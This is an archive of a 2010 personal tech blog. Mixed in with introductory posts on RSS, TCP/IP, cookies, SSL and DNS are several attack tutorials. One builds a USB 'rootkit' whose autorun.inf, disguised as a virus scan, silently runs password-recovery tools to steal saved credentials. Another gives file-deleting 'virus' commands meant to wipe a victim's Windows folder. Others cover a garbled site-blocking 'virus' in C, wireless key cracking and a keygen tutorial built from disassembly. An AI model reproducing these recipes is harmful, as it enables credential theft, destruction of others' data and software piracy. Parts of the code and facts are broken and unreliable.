Tuesday, December 28, 2010

RSS Feeds

RSS (most commonly expanded as Really Simple Syndication) is a family of web feed formats used to publish frequently updated works—such as blog entries, news headlines, audio, and video—in a standardized format. An RSS document (which is called a "feed", "web feed", or "channel") includes full or summarized text, plus metadata such as publishing dates and authorship. Web feeds benefit publishers by letting them syndicate content automatically.

Rather than checking your favorite blogs and news sites every day for updates, you can subscribe to a feed so that all the content from those sites comes to you. Software that checks feeds for updates and sends them to you is called a "feed reader".
Feeds come in a few different formats, the most common being RSS (Really Simple Syndication). Other formats include Atom and XML. Any good feed reader can accept any of these formats.

How Can I Find a Feed?

Websites that have an available feed you can subscribe to typically will show one of the following icons in the browser toolbar:
How it Works
The feed or RSS icon shows that there is content on that page or site that you can subscribe to through a feed reader. By clicking on the icon you can look at the feed and see what kind of content is there.

You can create feed for any page using page2rss.com.But reading feeds regularly may be a problem.Some prefer the feed to be delivered to their inbox.In that case you can visit feedmyinbox.com which sends feeds to your inbox for free.

Monday, December 13, 2010

TCP/IP protocols--various protocols

TCP/IP is a large collection of different communication protocols.

A Family of Protocols

TCP/IP is a large collection of different communication protocols based upon the two original protocols TCP and IP.

TCP - Transmission Control Protocol

TCP is used for transmission of data from an application to the network.
TCP is responsible for breaking data down into IP packets before they are sent, and for assembling the packets when they arrive.

IP - Internet Protocol

IP takes care of the communication with other computers.
IP is responsible for the sending and receiving data packets over the Internet.

HTTP - Hyper Text Transfer Protocol

HTTP takes care of the communication between a web server and a web browser.
HTTP is used for sending requests from a web client (a browser) to a web server, returning web content (web pages) from the server back to the client.


HTTPS takes care of secure communication between a web server and a web browser.
HTTPS typically handles credit card transactions and other sensitive data.

SSL - Secure Sockets Layer

The SSL protocol is used for encryption of data for secure data transmission.

SMTP - Simple Mail Transfer Protocol

SMTP is used for transmission of e-mails.

MIME - Multi-purpose Internet Mail Extensions

The MIME protocol lets SMTP transmit multimedia files including voice, audio, and binary data across TCP/IP networks.

IMAP - Internet Message Access Protocol

IMAP is used for storing and retrieving e-mails.

POP - Post Office Protocol

POP is used for downloading e-mails from an e-mail server to a personal computer.

FTP - File Transfer Protocol

FTP takes care of transmission of files between computers.

NTP - Network Time Protocol

NTP is used to synchronize the time (the clock) between computers.

DHCP - Dynamic Host Configuration Protocol

DHCP is used for allocation of dynamic IP addresses to computers in a network.

SNMP - Simple Network Management Protocol

SNMP is used for administration of computer networks.

LDAP - Lightweight Directory Access Protocol

LDAP is used for collecting information about users and e-mail addresses from the internet.

ICMP - Internet Control Message Protocol

ICMP takes care of error-handling in the network.

ARP - Address Resolution Protocol

ARP is used by IP to find the hardware address of a computer network card based on the IP address.

RARP - Reverse Address Resolution Protocol

RARP is used by IP to find the IP address based on the hardware address of a computer network card.

BOOTP - Boot Protocol

BOOTP is used for booting (starting) computers from the network.

PPTP - Point to Point Tunneling Protocol

PPTP is used for setting up a connection (tunnel) between private networks.


Monday, December 6, 2010

All About Keyloggers

Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.

There are two types of software key loggers:

The first is one you would personally install on a spouse's or child's computer to see what they are up to. The software runs in stealth mode (although most anti viruses pick them up) and emails you the results or stores them in a hidden folder that only you have access to.

The second (and most vicious) is received by downloading a file or visiting an infected website. These malicious key loggers record everything you type including passwords and account numbers. They then zip up on a pre-scheduled basis and send the recording back to the source where some jerk tries to filter your banking, investment, and other online funds for him (or her) self. This is why having a good anti virus, spyware sweeper, and malware sweeper are so important.

A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.
There are other approaches to capturing info about what you are doing.
  • Some keyloggers capture screens, rather than keystrokes.
  • Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection.
A keyloggers might be as simple as an exe and a dll that are placed on a machine and invoked at boot via an entry in the registry. Or a keyloggers could be which boasts these features:
  • Stealth: invisible in process list
  • Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
  • ProBot program files and registry entries are hidden (Windows 2000 / XP)
  • Includes Remote Deployment wizard
  • Active window titles and process names logging
  • Keystroke / password logging
  • Regional keyboard support
  • Keylogging in NT console windows
  • Launched applications list
  • Text snapshots of active applications.
  • Visited Internet URL logger
  • Capture HTTP POST data (including logins/passwords)
  • File and Folder creation/removal logging
  • Mouse activities
  • Workstation user and timestamp recording
  • Log file archiving, separate log files for each user
  • Log file secure encryption
  • Password authentication
  • Invisible operation
  • Native GUI session log presentation
  • Easy log file reports with Instant Viewer 2 Web interface
  • HTML and Text log file export
  • Automatic E-mail log file delivery
  • Easy setup & uninstall wizards
Because a keylogger can involve dozens of files, and has as a primary goal complete stealth from the user, removing one manually can be a terrifying challenge to any computer user. Incorrect removal efforts can result in damage to the operating system, instability, inability to use the mouse or keyboard, or worse. Further, some key loggers will survive manual efforts to remove them, re-installing themselves before the user even reboots.

Saturday, November 20, 2010

User Agent

Ever wondered how a website gets to know the browser you are using or you operating system,location,etc...The answer to this is user agents.The term was coined in the early days of the Internet when users needed tool to help navigate the Internet. Back then, the Internet was (an actually still is) completely text-based, and to navigate the text, text commands needed to be typed into a keyboard. Soon tools were developed to be the user's 'agent', acting on the user's behalf so that the user didn't have to understand the cryptic commands in order to retrieve information. Today, nearly everyone uses a web browser as their user agent.User Agents are basically a string transferred to a website.
User agent's usually contain six parts:
User agents consist of: application name, application version, compatibility flag, browser name and version, operating system and any extensions installed

User Agents User agents consist of: application name, application version, compatibility flag, browser name and version, operating system and any extensions installed.

Following images will help you how a user agent works:

Note:I do not own the images.

Sunday, November 14, 2010

Earn Money

Here is a new site which claims to create an online currency (like PayPal)
It is giving away money to earlybirds 

Some may even get prizes through Amazon

Saturday, November 13, 2010

Edit the webpage you want

Now here comes a simple way to edit documents the way you like....

Just go to address bar and type the command below (in italics)

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

Now edit the way you want (You will be able to edit it like a document and it will not affect the way a site looks to you permanently)

Here is the way I edited Youtube....

Sunday, October 17, 2010

Share Files Easily without any size limit

Now you can share files (without any size limit) more easily by creating your own computer as ftp server.

To use it
1 simply download and install the client
2 go to ftp server tab(at the bottom) and select new member
3 set a user name and password and a home directory
4 click apply and then select start server(in bottom left)
5 ask the person to type ftp://X.X.X.X in the address bar of browser(works in firefox ,please check for other browsers),where X.X.X.X is your ip address(your ip address can be found,try google search you will find a method)


note:I do not own the application.Also I am not responsible for any damage in any form that occurs from this application or this method.


Sunday, October 10, 2010

Some cool tricks of Notepad .

Thursday, September 23, 2010

Wireless Hacking

This tutorial is for educational purpose only
Sometimes there is wireless network accessible to you but requires a security key.We can find the security key using the method stated in this video.In other words we can connect to any wireless network available without even knowing the security key.

Note:this video is not owned by me.

Sunday, September 12, 2010


What are cookies in computers?
Also known as browser cookies or tracking cookies, cookies are small, often encrypted text files, located in browser directories. They are used by web developers to help users navigate their websites efficiently and perform certain functions. Due to their core role of enhancing/enabling usability or site processes, disabling cookies may prevent users from using certain websites.
Cookies are created when a user's browser loads a particular website. The website sends information to the browser which then creates a text file. Every time the user goes back to the same website, the browser retrieves and sends this file to the website's server. Computer Cookies are created not just by the website the user is browsing but also by other websites that run ads, widgets, or other elements on the page being loaded. These cookies regulate how the ads appear or how the widgets and other elements function on the page.For Managing cookies for different browsers see here
Standard uses for browser cookies
Website servers set cookies to help authenticate the user if the user logs in to a secure area of the website. Login information is stored in a cookie so the user can enter and leave the website without having to re-enter the same authentication information over and over.More information
Session Cookies are also used by the server to store information about user page activities so users can easily pick up where they left off on the server's pages. By default, web pages really don't have any 'memory'. Cookies tell the server what pages to show the user so the user doesn't have to remember or start navigating the site all over again. Cookies act as a sort of “bookmark” within the site. Similarly, cookies can store ordering information needed to make shopping carts work instead of forcing the user to remember all the items the user put in the shopping cart.
Persistent or tracking Cookies are also employed to store user preferences. Many websites allow the user to customize how information is presented through site layouts or themes. These changes make the site easier to navigate and/or lets user leave a part of the user's “personality” at the site. For Information on session and persistent and tracking cookies, see here

Friday, September 10, 2010

All about Bandwidth

Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company can provide is determined by their network connections, both internal to their data center and external to the public internet.

Network Connectivity

The internet, in the most simplest of terms, is a group of millions of computers connected by networks. These connections within the internet can be large or small depending upon the cabling and equipment that is used at a particular internet location. It is the size of each network connection that determines how much bandwidth is available. For example, if you use a DSL connection to connect to the internet, you have 1.54 Mega bits (Mb) of bandwidth. Bandwidth therefore is measured in bits (a single 0 or 1). Bits are grouped in bytes which form words, text, and other information that is transferred between your computer and the internet.

If you have a DSL connection to the internet, you have dedicated bandwidth between your computer and your internet provider. But your internet provider may have thousands of DSL connections to their location. All of these connection aggregate at your internet provider who then has their own dedicated connection to the internet (or multiple connections) which is much larger than your single connection. They must have enough bandwidth to serve your computing needs as well as all of their other customers. So while you have a 1.54Mb connection to your internet provider, your internet provider may have a 255Mb connection to the internet so it can accommodate your needs and up to 166 other users (255/1.54).

Thursday, August 26, 2010

Now Play Games using a virtual graphics card

Now comes a simple program which allows you to play games without having the hardware.You just need to select the file and the graphics card you require to play the file.You can select amongst these Graphics cards:

    VendorID: 4318
    DeviceID: 592
      • NVIDIA GeforceFX 5900 ultra
        VendorID: 4318
        DeviceID: 816
          • Ati Radeon 8500
            VendorID: 4098
            DeviceID: 20812
              • Ati Radeon 9800 pro
                VendorID: 4098
                DeviceID: 20040                                                                                                                      
                  Here is a link to download the software:

                  SO ENJOY :D :D

                  Wednesday, August 25, 2010

                  Secret Mobile Codes For Nokia

                  These codes will work on most Nokia Mobile Phones to activate/deactivate advanced hidden functions that you can’t change through the phone menu

                  *3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%

                  #3370# Deactivate Enhanced Full Rate Codec (EFR)

                  *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time

                  *#4720# Deactivate Half Rate Codec

                  Tuesday, August 24, 2010

                  Hack Saved Passwords using PenDrive

                  As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

                  MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

                  Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
                  Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

                  IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

                  Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

                  PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
                  Here is a step by step procedre to create the password hacking toolkit.

                  NOTE: You must temporarily disable your antivirus before following these steps.

                  1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
                  ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

                  2. Create a new Notepad and write the following text into it
                  ACTION= Perform a Virus Scan
                  save the Notepad and rename it from
                  New Text Document.txt to autorun.inf
                  Now copy the autorun.inf file onto your USB pendrive.

                  3. Create another Notepad and write the following text onto it.
                  start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt
                  start iepv.exe /stext iepv.txt
                  start pspv.exe /stext pspv.txt
                  start passwordfox.exe /stext passwordfox.txt
                  save the Notepad and rename it from
                  New Text Document.txt to launch.bat
                  Copy the launch.bat file also to your USB drive.

                  Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

                  1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

                  2. In the pop-up window, select the first option (Perform a Virus Scan).

                  3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

                  4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

                  This hack works on Windows 2000, XP and Vista

                  NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

                  Tuesday, August 17, 2010

                  All About SSL

                  Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.

                  What exactly is Secure Communication ?

                  Suppose there exists two communication parties A (client) and B (server).
                  Working of HTTP
                  When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between A and B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure
                  Now lets see the working of HTTPS
                  When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B‘s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and B he gets only the encrypted password (“xz54p6kd“) and not the original password. This is shown below

                  How is HTTPS implemented ?

                  HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses
                  1. An SSL Certificate enables encryption of sensitive information during online transactions.
                  2. Each SSL Certificate contains unique, authenticated information about the certificate owner.
                  3. A Certificate Authority verifies the identity of the certificate owner when it is issued.
                  How Encryption Works ?
                  Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).
                  How to identify a Secure Connection ?
                  In Internet Explorer, you will see a lock icon Picture of the Lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
                  In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
                  So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing using a Fake login Page.
                  Note:posted originally on : gohacking.com

                  Monday, August 16, 2010

                  Block Sites using a C program

                  Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
                  This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
                  NOTE: You can also block a website manually. But, here created virus automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
                  Here is the sourcecode of the virus.

                  #include char site_list[6][30]={
                  char ip[12]=”″;
                  FILE *target;
                  int find_root(void);
                  void block_site(void);
                  int find_root()
                  int done;
                  struct ffblk ffblk;//File block structure
                  /*to determine the root drive*/
                  /*to open the file*/
                  return 1;
                  /*to determine the root drive*/
                  /*to open the file*/
                  return 1;
                  /*to determine the root drive*/
                  /*to open the file*/
                  return 1;
                  /*to determine the root drive*/
                  /*to open the file*/
                  return 1;
                  else return 0;
                  void block_site()
                  int i;
                  fseek(target,0,SEEK_END); /*to move to the end of the file*/
                  void main()
                  int success=0;

                  How to Compile ?
                  For step-by-step compilation guide, refer to post How to compile C Programs.
                  1. To test, run the compiled module. It will block the sites that is listed in the source code.
                  2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
                  3. To remove the virus type the following the Run.
                  4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
                  5. Delete all such entries which contain the names of blocked sites.

                  courtesy : gohacking.com

                  Sunday, August 8, 2010

                  Creating new domain for personal use

                  Did you know that you can easily create your own domain names for your personal use on your computer? The method we're going to describe could come in handy many ways:

                  • You can map your current home page domain name (at your internet service provider's server) to use your own domain name such as MyCompanyName.com; for fun, or to help you test your HTML pages with your own domain name.
                  • On a local network (or an intranet) you can use your own domain names to access local and remote resources (web servers, etc.)
                  • You can create shorter and easier to remember domain names (or aliases) for already existing domain names.
                  • If your DNS server is slow, you can speedup the access to certain domain names a bit.
                  Here's how to...
                  • Locate or create a file named HOSTS
                    If you're using Windows 95, this file should be in the Windows directory ("C:\WINDOWS" for example).
                    If you're using Windows NT, HOSTS file should be in the "%SystemRoot%\system32\drivers\etc" directory ("C:\WINNT\system32\drivers\etc" for example).
                  • Use your favorite text editor (Notepad for example) to add entries to the HOSTS file. All entries to the HOSTS file should be in the following format:

                    For example, let's say you want to create a domain name [alias] for a known domain name -- "www.chamisplace.com" for example. First, find out the IP address of the "known" (or already existing domain name) by typing the following command at the "DOS or Command Prompt:"


                    or according to our example:

                    PING www.chamisplace.com
                    Record the IP address for that domain -- for example.

                    Now, decide what your new domain name for www.chamisplace.com should be -- let's say you want to call it "tipssite.com" (something easier to remember).

                    All you have to do to map tipssite.com to www.chamisplace.com is to add the following line to your HOSTS file:


                    Now you can access www.chamisplace.com by using tipssite.com instead -- http://tipssite.com/ for example.

                  All about zone records and zone file

                  Zone files organize the zone records for domain names and subdomains in a DNS server. Every domain name and subdomain has a zone file, and each zone file contains zone records. These files, editable in any plain text editor, hold the DNS information linking domain names and subdomains to IP addresses. Zone files usually contain several different zone records.
                  NOTE: Although domain names might have subdomains, the zone files for subdomains are not considered sub-zone. All zone files are separate entities and do not have a hierarchal structure.
                  The most common records contained in a zone file are start of authority (SOA), nameserver, mail exchanger, host, and CNAME. These are described below.
                  • Start of Authority (SOA) — Required for every zone file, the SOA record contains caching information, the zone administrator’s email address, and the master name server for the zone. The SOA also contains a number incremented with each update. As this number updates, it triggers the DNS to reload the zone data.
                  • Name Server (NS) — The NS record contains the name server information for the zone.
                  • Mail Exchanger (MX) — The MX record provides the mail server information for that zone to deliver email to the correct location.
                  • Host (A) — Uses the A record to map an IP address to a host name. This is the most common type of record on the Internet.
                  • Canonical Name (CNAME) — A CNAME is an alias for a host. Using CNAMEs, you can have more than one DNS name for a host. CNAME records point back to the A record. When you change the IP address in your A record, all CNAME records for that domain name automatically follow the new IP address.
                  • Text (TXT) — This is an informational record. Use it for additional information about a host or for technical information to servers.
                  • Service Records (SRV) — SRV records are resource records used to identify computers hosting specific services.
                  • AAAA — AAAA records store a 128-bit Internet Protocol version 6 (IPv6) address that does not fit the standard A record format. For example, 2007:0db6:85a3:0000:0000:6a2e:0371:7234 is a valid 128-bit/IPv6 address.

                  Saturday, August 7, 2010

                  Make Your own virus!!!

                  Yes, Now it is possible for you to have your own virus. But before doing anything yourself first of all you need to read the whole article first. And let me remind you that any problem occurs after you do anything then you are solely responsible for what has happened and I will not be responsible.

                  First of all Open your notepad and type the following......... del c:\boot।ini c:\del autoexec.bat Now Save as anyname.exe. Create this in C: drive

                  The only thing you need is Notepad.

                  1. Create a text file called TEST.txt(empty) in C:\
                  2. Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then save it as "Test.cmd".
                  3. Now run the file "Test.cmd"go to C:\ and you'll see your Test.txt is gone.

                  Now, the real work :

                  1. Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd.
                  2. Now DON'T Run the file or you'll lose your WINDOWS map.
                  So, that's the Virus. In this way you can make a virus to delete any file you want.

                  Now to take revenge. Send you file to your victim. Once victim opens it. WINDOWS map is Deleted. And he will have to install WINDOWS again.
                  Beware : Its simple but a strong virus that can delete anyones Windows OS ...Note : I am not Taking any Responsibilties if by this you damage your windows.


                  Courtesy: http://arunpillai90.blogspot.com/2010/04/make-your-own-virus.html

                  Tuesday, August 3, 2010

                  free airtel gprs

                   In this post, i will tell you just a web address . All you need to do is:
                  • Activate Airtel Live on ur CELL phone (No need to pay,its free).
                  • Save the airtel live settings. use it as default settings
                  • Open browser and enter website in place of YYYY in
                  For example: or
                  Note:I do not take responsibility of damage that may cause due to this post or any other present on this blog.

                  Friday, July 23, 2010

                  how to make keygens

                  How to make key generators?
                  I take no responsibility of the usage of this information.
                  This tutorial, is for educational knowledge ONLY.
                  Hi there, in this tutorial, I intend to teach you how to make a pretty
                  simple keygen, of a program called W3Filer 32 V1.1.3.
                  W3Filer is a pretty good web downloader...
                  I guess some of you might know the program.
                  I`ll assume you know:
                  A.How to use debugger (in this case, SoftIce).
                  B.How to crack, generally (finding protection routines,patching them,etc...).
                  C.How to use Disassembler (This knowledge can help).
                  E.How to code in Turbo Pascal (tm).
                  Tools you`ll need:
                  A.SoftIce 3.00/01 or newer.
                  B.WD32Asm. (Not a must).
                  C.The program W3Filer V1.13 (if not provided in this package), can be found in
                  www.windows95.com I believe.
                  D.Turbo Pascal (ANY version).
                  Well, enough blah blah, let's go cracking...
                  Run W3Filer 32.
                  A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now,
                  We notice this program has some kind of serial number (Mine is 873977046),
                  Let's keep the serial in mind, I bet we`ll meet it again while we're on
                  the debugger.
                  Well, now, let's put your name and a dummy reg code...
                  set a BP on GetDlgItemTextA, and, press OK.
                  We pop inside GetDlgItemTextA, Lets find the registration routine...
                  I`ll save you the work, the registration routine is this:
                  :00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
                  :00404DB8 52 push edx ---> Your user name here.
                  :00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
                  :00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
                  :00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
                  :00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
                  Well, Let's enter the CALL 40A2C9, and see what's inside it:
                  (Please read my comments in the code).
                  * Referenced by a CALL at Addresses:
                  |:00404DB9 , :00407F76
                  :0040A2C9 55 push ebp
                  :0040A2CA 8BEC mov ebp, esp
                  :0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
                  :0040A2D2 53 push ebx
                  :0040A2D3 56 push esi
                  :0040A2D4 57 push edi
                  :0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
                  :0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
                  :0040A2DE 33C0 xor eax, eax
                  :0040A2E0 EB16 jmp 0040A2F8
                  * Referenced by a (U)nconditional or (C)onditional Jump at Address:
                  :0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the
                  interesting part.
                  :0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current
                  char in the user name, Hmm, 20h=' '...
                  :0040A2E8 740D je 0040A2F7 ----> Let's see,
                  :0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop
                  does, is copying
                  the user name from
                  [EDX], to [ESI], WITHOUT the spaces!
                  (Keep this in mind! ).
                  :0040A2EC 880C06 mov byte ptr [esi+eax], cl
                  :0040A2EF 42 inc edx
                  :0040A2F0 40 inc eax
                  :0040A2F1 C6040600 mov byte ptr [esi+eax], 00
                  :0040A2F5 EB01 jmp 0040A2F8
                  * Referenced by a (U)nconditional or (C)onditional Jump at Address:
                  :0040A2F7 42 inc edx
                  * Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
                  |:0040A2E0(U), :0040A2F5(U)
                  :0040A2F8 803A00 cmp byte ptr [edx], 00
                  :0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got
                  what it does,
                  Let's continue tracing
                  the code...
                  :0040A2FD 56 push esi --------> The user name is pushed, in order
                  Upcase it's chars.
                  * Reference To: USER32.CharUpperA, Ord:0000h
                  :0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in
                  upper case.
                  :0040A303 56 push esi -----> Our name in upper case here.
                  * Reference To: cw3220mt._strlen, Ord:0000h
                  :0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
                  :0040A309 59 pop ecx
                  :0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
                  :0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
                  :0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
                  :0040A311 83C8FF or eax, FFFFFFFF
                  :0040A314 EB67 jmp 0040A37D
                  * Referenced by a (U)nconditional or (C)onditional Jump at Address:
                  :0040A316 33D2 xor edx, edx
                  :0040A318 33C0 xor eax, eax
                  :0040A31A 3BC8 cmp ecx, eax
                  :0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless
                  ============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ==================
                  One thing before we continue, EDX = 00000000h as we enter to the next instructions.
                  * Referenced by a (U)nconditional or (C)onditional Jump at Address:
                  :0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user
                  name, offset EAX.
                  :0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...
                  (Remember that).
                  :0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in
                  user name , offset EAX.
                  :0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the
                  offset in user name! (Remember that).
                  :0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was
                  Shelled (Ding Dong =)).
                  :0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE
                  of this registration routine!!!
                  :0040A330 40 inc eax -----> Increase EAX by one (next char).
                  :0040A331 3BC8 cmp ecx, eax
                  :0040A333 7FE9 jg 0040A31E ----> If ECX
                  * Referenced by a (U)nconditional or (C)onditional Jump at Address:
                  :0040A335 A120674100 mov eax, dword ptr [00416720] ---> HMMMMMM, What's in
                  :0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
                  Does this number in EAX look
                  familiar to us? ;-)
                  If you still don`t understand,
                  than, It's
                  our SERIAL NUMBER! (PLEASE, take
                  your time, and check by
                  yourself - don`t trust me!). OK,
                  so now we know,
                  That it SHR's EAX by 03 (SAR is
                  almost identical to SHR).
                  :0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the
                  loop, the serial number shr'd by 03h
                  :0040A33F 52 push edx -------> Let's continue. (At this point, I
                  can tell you , the reg number, is
                  in EDX - only that the reg number
                  is in HEX --> That's how you enter it).
                  * Possible StringData Ref from Data Obj ->"%lx"
                  :0040A340 685EF54000 push 0040F55E
                  :0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
                  :0040A34B 52 push edx
                  * Reference To: USER32.wsprintfA, Ord:0000h
                  :0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes
                  the value from EDX, and turns it to an hex string).
                  :0040A351 83C40C add esp, 0000000C
                  :0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
                  THIS is the reg number! That's enough for us, the rest of
                  the code, is
                  just for comparing the correct reg code with ours.
                  :0040A35A 51 push ecx
                  * Reference To: USER32.CharLowerA, Ord:0000h
                  :0040A35B E8B8320000 Call 0040D618
                  :0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
                  :0040A366 50 push eax
                  :0040A367 FF750C push [ebp+0C]
                  * Reference To: cw3220mt._strcmp, Ord:0000h
                  :0040A36A E875300000 Call 0040D3E4
                  :0040A36F 83C408 add esp, 00000008
                  :0040A372 85C0 test eax, eax
                  :0040A374 7405 je 0040A37B
                  :0040A376 83C8FF or eax, FFFFFFFF
                  :0040A379 EB02 jmp 0040A37D
                  * Referenced by a (U)nconditional or (C)onditional Jump at Address:
                  :0040A37B 33C0 xor eax, eax
                  * Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
                  |:0040A314(U), :0040A379(U)
                  :0040A37D 5F pop edi
                  :0040A37E 5E pop esi
                  :0040A37F 5B pop ebx
                  :0040A380 8BE5 mov esp, ebp
                  :0040A382 5D pop ebp
                  :0040A383 C3 ret
                  Making the actual Keygen
                  Now, after I've explained how does the program calculate the registration
                  code, you can either write your own keymaker, without looking at my code, or
                  look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time).
                  That's it, here's the source of my keygen:
